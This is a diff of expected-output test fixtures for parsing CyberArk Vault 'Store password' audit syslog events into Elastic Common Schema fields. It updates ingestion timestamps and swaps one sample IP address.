@@ -494,7 +471,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301357800Z", + "ingested": "2021-12-09T13:36:44.612794500Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" 
@@ -563,7 +540,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301360600Z", + "ingested": "2021-12-09T13:36:44.612799800Z", "original": "\u003c5\u003e1 2021-03-14T11:48:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 04:48:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T11:48:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Groups\\\\WindowsGroup\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WindowsDesktopLocalAccountsRotationalPolicy\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" 
Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615722505\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CurrInd\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615722505\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" 
@@ -643,7 +620,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301363300Z", + "ingested": "2021-12-09T13:36:44.612805300Z", "original": "\u003c5\u003e1 2021-03-15T10:12:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"27\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"StartChangeNotBefore\\\" Value=\\\"1615754905\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615231204\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:21\",\"IsoTimestamp\":\"2021-03-15T10:12:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating 
System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615754905\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -677,7 +654,7 @@ }, "@timestamp": "2021-03-15T13:13:01.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -693,13 +670,13 @@ "severity": "Info", "iso_timestamp": "2021-03-15T13:13:01Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e294\u003c/MessageID\u003e\n \u003cDesc\u003eStore password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore password\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e294\u003c/MessageID\u003e\n \u003cDesc\u003eStore password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore 
password\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Store password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", 
@@ -712,7 +689,7 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615813465" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "127.0.0.1", "action": "Store password", 
@@ -726,8 +703,8 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301366200Z", - "original": "\u003c5\u003e1 2021-03-15T13:13:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:13:01\",\"IsoTimestamp\":\"2021-03-15T13:13:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store 
password\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:44.612810100Z", + "original": "\u003c5\u003e1 2021-03-15T13:13:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n 
\u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:13:01\",\"IsoTimestamp\":\"2021-03-15T13:13:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "294", "kind": "event" } 
